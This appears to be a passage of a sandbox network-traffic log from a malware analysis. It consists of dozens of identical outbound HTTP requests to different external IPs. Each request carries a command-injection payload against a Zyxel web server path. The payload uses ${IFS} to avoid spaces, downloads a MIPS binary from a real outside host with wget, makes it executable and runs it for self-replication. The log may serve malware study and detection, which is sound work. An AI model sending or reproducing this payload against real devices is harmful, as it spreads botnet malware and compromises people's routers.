                                                Jan 12, 2024 18:16:41.889796972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9155192.168.2.233458225.173.70.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889805079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9156192.168.2.2358234106.44.139.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889826059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9157192.168.2.235633043.244.180.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889870882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9158192.168.2.235572623.224.140.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889913082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9159192.168.2.233889250.196.48.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889930010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9160192.168.2.233812284.97.70.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.889981031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9161192.168.2.233551462.151.8.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890038967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9162192.168.2.2339514154.105.241.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890053988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9163192.168.2.23511942.137.159.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890120983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9164192.168.2.234259027.111.29.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890180111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9165192.168.2.235409848.244.56.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890222073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9166192.168.2.235430269.0.78.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890269041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9167192.168.2.233768062.121.59.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890317917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9168192.168.2.2350676104.116.50.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890346050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9169192.168.2.2341296201.205.22.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890384912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9170192.168.2.2339894210.56.232.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890419960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9171192.168.2.234131277.139.78.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890466928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9172192.168.2.234486676.247.208.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890501976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9173192.168.2.233906696.69.159.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890536070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9174192.168.2.2340806184.7.180.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890590906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9175192.168.2.2344104138.69.45.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890600920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9176192.168.2.233898299.65.255.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890669107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9177192.168.2.2336860202.84.81.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890702009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9178192.168.2.234118224.28.58.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890758991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9179192.168.2.2346446190.160.93.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890789032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9180192.168.2.2334938199.216.107.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890820980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9181192.168.2.2358898107.26.191.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890865088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9182192.168.2.233581445.139.25.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890897036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9183192.168.2.233663039.100.137.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890942097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9184192.168.2.2334802117.110.48.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.890985966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9185192.168.2.2338566119.233.221.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891040087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9186192.168.2.2357508108.95.93.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891092062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9187192.168.2.2338654221.128.76.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891132116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9188192.168.2.2340796126.76.2.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891163111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9189192.168.2.234929214.209.244.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891181946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9190192.168.2.2360142210.62.26.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891232014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9191192.168.2.23430804.171.121.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891271114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9192192.168.2.2347480184.146.174.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891314030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9193192.168.2.2358910136.133.204.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891343117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9194192.168.2.2353398212.44.179.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891369104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9195192.168.2.2347468166.70.168.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891405106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9196192.168.2.2349656120.66.233.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891424894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9197192.168.2.2337440203.158.227.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891472101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9198192.168.2.23593429.216.114.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891495943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9199192.168.2.2341626170.171.61.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891526937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9200192.168.2.2340150141.138.6.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891550064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9201192.168.2.2343858177.43.251.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891572952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9202192.168.2.2339248210.111.84.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891602993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9203192.168.2.2346008189.19.112.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891654968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9204192.168.2.2333502117.192.25.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891685963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9205192.168.2.2339346146.168.139.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891733885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9206192.168.2.234302497.10.113.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891773939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9207192.168.2.2350612194.203.152.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891794920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9208192.168.2.2355678114.193.32.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891819954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9209192.168.2.2350302145.224.134.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891882896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9210192.168.2.2335068149.104.81.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891916990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9211192.168.2.2343140105.254.38.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.891973019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9212192.168.2.234334885.116.57.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892010927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9213192.168.2.2359102160.154.239.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892046928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9214192.168.2.2337984110.197.195.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892085075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9215192.168.2.23459481.83.69.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892111063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9216192.168.2.2346650188.99.254.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.892160892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9217192.168.2.235351818.159.122.100443
                                                TimestampBytes transferredDirectionData
